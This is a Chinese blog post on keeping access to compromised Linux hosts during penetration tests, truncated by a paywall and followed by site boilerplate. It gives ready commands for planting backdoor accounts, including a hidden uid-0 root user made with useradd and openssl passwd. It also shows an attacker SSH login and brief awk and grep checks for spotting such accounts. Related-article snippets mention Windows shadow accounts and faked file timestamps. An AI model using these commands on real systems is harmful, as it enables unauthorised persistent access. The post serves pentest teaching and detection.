Linux权限维持

最新推荐文章于 2024-05-06 13:17:02 发布
最新推荐文章于 2024-05-06 13:17:02 发布
阅读量3k 收藏 10
点赞数 2
分类专栏: 渗透测试 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41949487/article/details/118389859
版权

在渗透过程中拿到目标权限只是开始,通常会留下后门以便再次访问(简称APT)。所以需要进行权限维持,隐藏后门。常见的Linux后门有cron后门、ssh后门、vim后门、隐藏文件、添加超级用户、alias后门等等,本文将对Linux下常见的权限维持后门技术进行解析。

添加用户

添加uid=0的用户

  1. 创建用户,并修改/etc/passwd文件

useradd tide;echo 'tide:123456' | chpasswd # 创建用户tide并修改密码为123456

vi /etc/passwd # 修改passwd文件,将tide用户的uid改为0

改动前:

改动后:

攻击端:

ssh tide@被控端ip -p 端口

  1. 使用useradd -p方法,通过 ` ` 存放可执行的系统命令添加uid=0的用户;

useradd -p `openssl passwd -1 -salt 'salt' 123456` chiyu -o -u 0 -g root -G root -s /bin/bash -d /home/chiyu

添加普通用户

  1. useradd -p `openssl passwd -1 -salt 'salt' 123456` chiyu

#使用useradd -p方法,通过 ` ` 存放可执行的系统命令;

#创建一个用户名为chiyu,密码为123456的普通用户;

攻击端使用chiyu连接(以下就不一一示范了)

  1. useradd -p "$(openssl passwd -1 123456)" chiyu

#使用useradd -p方法,通过 "$()" 存放可执行的系统命令添加用户;

  1. useradd chiyu;echo 'chiyu:123456'|chpasswd

#chpasswd方法添加用户;

  1. useradd chiyu;echo -e "123456\n123456\n" |passwd chiyu

#echo -e方法添加用户;

检测:

awk -F: '$3==0{print $1}' /etc/passwd

# 查询特权用户(uid=0的用户)

awk '/\$1|\$6/{print $1}' /etc/shadow

# 查询可以远程登录的账户信息

more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"

# 查询除root账户外,其他存在sudo权限的账户(如非管理需要,普通账号应删除sudo权限)

最低0.47元/天 解锁文章
池羽_chiyu
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows权限维持
谢公子的博客
05-28 2265
目录 创建隐蔽账号 进程迁移 启动目录 横向渗透 在红蓝对抗实战中,当我们获取到一台Windows主机的权限后,首先要做的就是怎么维持住该权限。因为防守方的实力也在不断增强,并且他们的流量监测设备也在不断监控,如果发现机器被植入木马,他们肯定会采取措施。 比如采取以下几点措施: 查杀木马进程 重启主机 断网 关闭主机 而对于我们维持权限,可以有以下几点: 创建隐蔽账号 如果目标主机的3389端口开放着,则我们可以创建隐蔽账号。 或者读取该主机administrator账号密码,使用
linux权限维持.pdf
03-31
linux权限维持.pdf
2024年最新Windows权限维持技术总结、复现_cs权限维持,网络安全开发技术总结
最新发布
2401_84264692的博客
05-06 860
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。
windows 权限维持
weixin_52263461的博客
01-20 248
添加影子用户 影子用户顾名思义就是一个隐藏用户,只能通过注册表查看这个用户,其它方式是找不到这个用户的信息的。在用户名后面添加$可以创建匿名的用户再添加到管理员组。 Net user看不到用户,但是在计算机管理里面还是可以看的到。 创建普通账号 net user huahua 123456 /add net localgroup administrators huahua /add (将用户加入组) 创建隐藏账户 net user huahua$ 123456 /add net user 查看
权限维持
WX公众号-小白学安全
04-15 735
攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和后门文件,本文介绍Linux下的几种隐藏技术。本文主要介绍了Linux下的几种隐藏技术,包括隐藏文件、隐藏权限、隐藏历史操作命令、端口复用、进程隐藏等方面的技巧。仅作抛砖引玉之用,欢迎留言分享。在渗透测试中,有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用框架获得持久性权限呢?
[总结]Linux权限维持1
08-03
1.[总结]SQL注总结 3.[后渗透]多姿势绕过 Powershell 调保护 5.[总结]加载 DLL 的多种式 7.[逆向]PE件格式解析 3. [WEB
linux suid权限维持速查表1
08-03
这篇速查表主要列举了多种利用SUID权限维持的方法,这些方法大多涉及通过不同的命令或者脚本启动一个shell,以获得root权限。以下是一些示例: 1. `chmod u+s program`: 这个命令将SUID权限赋予名为`program`的文件...
Linux内网渗透.doc
07-08
本文将从拿到一个 Linux shell 开始,介绍 Linux 内网渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux 横向移动、Linux 权限维持Linux 痕迹清理几个部分。 一、容器逃逸 容器逃逸是...
Linux Polkit 权限提升漏洞(CVE-2021-4034)在 CentOS/RHEL 6 修复升级的 rpm 离线包
02-09
Linux Polkit,也称为 PolicyKit...总之,Linux Polkit是系统权限管理的关键组件,而CVE-2021-4034的修复对于维持CentOS/RHEL 6系统的安全性至关重要。及时更新和妥善管理这些组件可以有效地保护服务器免受潜在的攻击。
linux+安装clickhouse.doc
11-24
Linux环境中安装ClickHouse是一个涉及多个步骤的过程,ClickHouse是一个高性能的开源列式数据库管理系统(DBMS),主要用于在线分析处理(OLAP)。以下是对安装过程的详细解释: 1. **用户与用户组创建**: 在...
linux memcache安装配置方法
09-15
libevent采用非阻塞I/O模型,即使面对大量并发连接,也能维持O(1)的时间复杂度,确保了系统的高效运行。 安装配置Memcache的步骤如下: 1. 安装依赖库:首先需要安装libevent及其开发库,可以通过包管理器(如`yum...
Linux提权的简单总结1
08-03
4. **持久化**:创建后台服务、定时任务或隐藏进程以维持权限。 5. **进一步渗透**:利用新获取的权限访问更深层的系统资源。 在Linux提权中,了解文件权限、系统信息、用户账户管理和内核漏洞是关键。在实践中,要...
Linux环境下的SSD优化.pdf
07-08
快速写入和慢速覆盖是SSD的特点,TRIM命令帮助维持SSD的高速运行,通过提前清除已删除页面,使得驱动器可以在后台执行慢速的覆盖操作。 10. **调整文件系统参数**:在`/etc/fstab`中,使用`discard`参数启用TRIM,`...
linux权限维持
E1even的博客
11-04 673
接下来将开启linux权限维持的学习: 放一张Llinux权限维持镇楼图(图源ShAun’s Blog) 修改文件创建时间 如果蓝队根据文件修改时间来判断文件是否为后门,如参考index.php的时间再来看shell.php的时间就可以判断shell.php的生成时间有问题。 使用touch命令修改时间和属性 touch -r index.php shell.php 这里就复刻了index.php的属性,创建了一个同属性的shell.php ...
Linux权限维持有哪些方法
04-29
Linux权限维持的方法有很多,其中一些常见的方法包括: 1. 提权攻击:攻击者利用系统中存在的漏洞获取root权限。 2. 密码猜测:攻击者通过猜测密码来获取用户的权限。 3. 社会工程学攻击:攻击者通过欺骗用户来获取用户的权限,例如伪装成管理员向用户索取密码或其他敏感信息。 4. 后门攻击:攻击者在系统中植入后门程序,以便在以后可以随时获取权限。 5. 特权提升攻击:攻击者利用系统中的漏洞或配置错误,将自己的权限提升到更高的级别。 为了防止权限维持攻击,可以采取以下措施: 1. 及时升级系统和软件,修补漏洞。 2. 确保所有用户和管理员都使用强密码,并定期更换密码。 3. 加强身份验证和授权控制。 4. 使用安全的文件权限和访问控制策略。 5. 定期审查系统日志,以便及时发现异常行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值